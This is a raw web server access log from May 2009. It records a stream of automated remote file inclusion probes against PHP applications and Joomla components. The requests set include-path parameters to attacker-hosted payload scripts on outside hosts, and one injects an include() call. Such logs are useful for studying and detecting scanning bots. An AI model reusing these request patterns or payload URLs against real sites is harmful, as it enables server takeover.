113.29.225.7 - - [28/May/2009:12:17:30 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/andrie_it/id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
210.100.220.126 - - [28/May/2009:12:21:48 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:21:49 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:23:38 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [28/May/2009:12:23:38 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
65.98.80.2 - - [28/May/2009:12:25:20 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:12:25:20 -0500] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:12:25:20 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:12:25:30 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.165.73.157 - - [28/May/2009:12:26:05 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.165.73.157 - - [28/May/2009:12:26:05 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
121.165.73.157 - - [28/May/2009:12:26:05 -0500] "GET /logs/access_log.1242172800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:12:26:13 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
85.17.162.28 - - [28/May/2009:12:26:14 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
121.165.73.157 - - [28/May/2009:12:26:46 -0500] "GET /logs/access_log.1238112000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:12:27:45 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:12:27:45 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:12:27:45 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.119.103.12 - - [28/May/2009:12:27:45 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:27:55 -0500] "GET /logs//errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:27:58 -0500] "GET //errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:27:58 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:12:28:03 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:12:28:03 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:12:28:03 -0500] "GET /logs/access_log.1242000000/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
88.183.32.67 - - [28/May/2009:12:28:19 -0500] "GET /logs/access_log.1226966400//errors.php?error=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.165.73.157 - - [28/May/2009:12:29:25 -0500] "GET /logs/access_log.1241740800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:12:29:52 -0500] "GET //include/write.php?dir=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:12:29:52 -0500] "GET /logs//include/write.php?dir=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:12:29:52 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.165.73.157 - - [28/May/2009:12:30:17 -0500] "GET /logs/access_log.1240444800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:12:30:20 -0500] "GET /logs/access_log.1242172800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:12:30:20 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:12:30:21 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:12:30:25 -0500] "GET /logs/access_log.1238112000/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:12:31:23 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:12:31:23 -0500] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:12:31:23 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.98.80.2 - - [28/May/2009:12:31:28 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:12:31:44 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:12:32:23 -0500] "GET /logs/access_log.1241740800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.237.82.158 - - [28/May/2009:12:32:23 -0500] "GET /logs/access_log.1240444800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:12:32:40 -0500] "GET //content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:12:32:40 -0500] "GET /logs//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
201.134.110.45 - - [28/May/2009:12:32:40 -0500] "GET /logs/access_log.1239753600//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:12:33:05 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:12:33:05 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:12:33:05 -0500] "GET /logs/access_log.1239753600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
216.157.8.98 - - [28/May/2009:12:35:48 -0500] "GET //include/mail.inc.php?skin_board_path=http://cocoking.com/upload/gallery/id.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
216.157.8.98 - - [28/May/2009:12:35:48 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://cocoking.com/upload/gallery/id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
218.249.36.194 - - [28/May/2009:12:35:49 -0500] "GET /logs/access_log.1239753600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:12:35:49 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:12:35:49 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
218.249.36.194 - - [28/May/2009:12:35:50 -0500] "GET /logs/access_log.1234828800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 383 "-""Mozilla/5.0"
94.23.200.54 - - [28/May/2009:12:35:57 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
94.23.200.54 - - [28/May/2009:12:35:57 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
94.23.200.54 - - [28/May/2009:12:35:57 -0500] "GET /logs/access_log.1242172800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
94.23.200.54 - - [28/May/2009:12:37:57 -0500] "GET /logs/access_log.1242000000/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
213.165.83.204 - - [28/May/2009:12:38:42 -0500] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
213.165.83.204 - - [28/May/2009:12:38:42 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.165.83.204 - - [28/May/2009:12:38:42 -0500] "GET //components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.208.111.178 - - [28/May/2009:12:38:45 -0500] "GET /logs/errors.php?error=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:12:38:45 -0500] "GET /errors.php?error=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.165.83.204 - - [28/May/2009:12:38:47 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.208.111.178 - - [28/May/2009:12:38:49 -0500] "GET /logs/errors.php?error=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:12:38:49 -0500] "GET /errors.php?error=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
201.232.54.48 - - [28/May/2009:12:39:01 -0500] "GET /logs/access_log.1242172800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 369 "-""Mozilla/5.0"
211.172.225.50 - - [28/May/2009:12:39:19 -0500] "GET /logs/index.admin_events.php?http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
211.172.225.50 - - [28/May/2009:12:39:19 -0500] "GET /index.admin_events.php?http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
200.123.133.130 - - [28/May/2009:12:39:30 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
200.123.133.130 - - [28/May/2009:12:39:30 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
200.123.133.130 - - [28/May/2009:12:39:30 -0500] "GET /logs/access_log.1242172800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
200.123.133.130 - - [28/May/2009:12:39:35 -0500] "GET /logs/access_log.1242259200/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
209.200.27.114 - - [28/May/2009:12:40:28 -0500] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
209.200.27.114 - - [28/May/2009:12:40:29 -0500] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
86.39.131.85 - - [28/May/2009:12:40:39 -0500] "GET /logs/access_log.1237248000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://lms3.bu.ac.th:8080//claroline/phpbb//aaa/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
86.39.131.85 - - [28/May/2009:12:40:39 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://lms3.bu.ac.th:8080//claroline/phpbb//aaa/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
86.39.131.85 - - [28/May/2009:12:40:39 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://lms3.bu.ac.th:8080//claroline/phpbb//aaa/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:12:40:54 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:12:40:56 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:12:40:56 -0500] "GET /logs/access_log.1236643200//include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
86.39.131.85 - - [28/May/2009:12:41:26 -0500] "GET /logs/access_log.1236470400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://lms3.bu.ac.th:8080//claroline/phpbb//aaa/id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:12:42:04 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:12:42:04 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:12:42:04 -0500] "GET /logs/access_log.1236643200//include/mail.inc.php?skin_board_path=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.172.225.50 - - [28/May/2009:12:42:26 -0500] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
211.172.225.50 - - [28/May/2009:12:42:27 -0500] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
74.55.117.34 - - [28/May/2009:12:43:38 -0500] "GET /logs//rgboard//include/bbs.lib.inc.php?site_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.55.117.34 - - [28/May/2009:12:43:38 -0500] "GET //rgboard//include/bbs.lib.inc.php?site_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
207.213.245.215 - - [28/May/2009:12:43:58 -0500] "GET /logs//include/write.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:12:43:58 -0500] "GET //include/write.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
74.55.117.34 - - [28/May/2009:12:44:00 -0500] "GET /logs//rgboard//include/bbs.lib.inc.php?site_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.55.117.34 - - [28/May/2009:12:44:00 -0500] "GET //rgboard//include/bbs.lib.inc.php?site_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:12:44:16 -0500] "GET /logs/errors.php?error=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.208.111.178 - - [28/May/2009:12:44:16 -0500] "GET /errors.php?error=http://dgsoft.50webs.com/3.php?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
202.75.4.169 - - [28/May/2009:12:44:49 -0500] "GET /logs/index.php?option=com_rsgallery2&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [28/May/2009:12:44:50 -0500] "GET /index.php?option=com_rsgallery2&task=section&id=1&Itemid=2&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
195.34.78.110 - - [28/May/2009:12:45:20 -0500] "GET /logs//rgboard//include/bbs.lib.inc.php?site_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:12:45:21 -0500] "GET /logs//rgboard//include/bbs.lib.inc.php?site_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:12:45:21 -0500] "GET //rgboard//include/bbs.lib.inc.php?site_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
195.34.78.110 - - [28/May/2009:12:45:21 -0500] "GET //rgboard//include/bbs.lib.inc.php?site_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
211.172.225.50 - - [28/May/2009:12:46:53 -0500] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
211.172.225.50 - - [28/May/2009:12:46:54 -0500] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
85.17.162.28 - - [28/May/2009:12:47:18 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:12:47:22 -0500] "GET /logs/access_log.1235174400//modules/4nAlbum/public/displayCategory.php?basepath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
85.17.162.28 - - [28/May/2009:12:47:22 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:12:47:28 -0500] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:12:47:28 -0500] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:12:47:28 -0500] "GET /logs/access_log.1242086400/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
72.52.235.39 - - [28/May/2009:12:47:44 -0500] "GET /logs/access_log.1242432000/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.23.158.226 - - [28/May/2009:12:49:00 -0500] "GET /logs/access_log.1242086400/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.23.158.226 - - [28/May/2009:12:49:00 -0500] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.23.158.226 - - [28/May/2009:12:49:00 -0500] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.23.158.226 - - [28/May/2009:12:49:05 -0500] "GET /logs/access_log.1242432000/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:12:49:08 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:12:49:08 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.239.76.25 - - [28/May/2009:12:49:08 -0500] "GET /logs/access_log.1235174400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
209.200.27.114 - - [28/May/2009:12:49:40 -0500] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
209.200.27.114 - - [28/May/2009:12:49:41 -0500] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
209.200.27.114 - - [28/May/2009:12:49:50 -0500] "GET /logs//admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
209.200.27.114 - - [28/May/2009:12:49:51 -0500] "GET //admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
209.200.27.114 - - [28/May/2009:12:49:58 -0500] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
209.200.27.114 - - [28/May/2009:12:49:58 -0500] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
87.230.85.142 - - [28/May/2009:12:50:13 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.depo.org.pk/images/21/ts?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
211.172.225.50 - - [28/May/2009:12:50:22 -0500] "GET /logs//admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
211.172.225.50 - - [28/May/2009:12:50:23 -0500] "GET //admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
211.172.225.50 - - [28/May/2009:12:50:56 -0500] "GET /logs//inc/functions.inc.php?config[ppa_root_path]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
211.172.225.50 - - [28/May/2009:12:50:57 -0500] "GET //inc/functions.inc.php?config[ppa_root_path]=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
207.213.245.215 - - [28/May/2009:12:51:38 -0500] "GET /logs/include/write.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
207.213.245.215 - - [28/May/2009:12:51:53 -0500] "GET /include/write.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
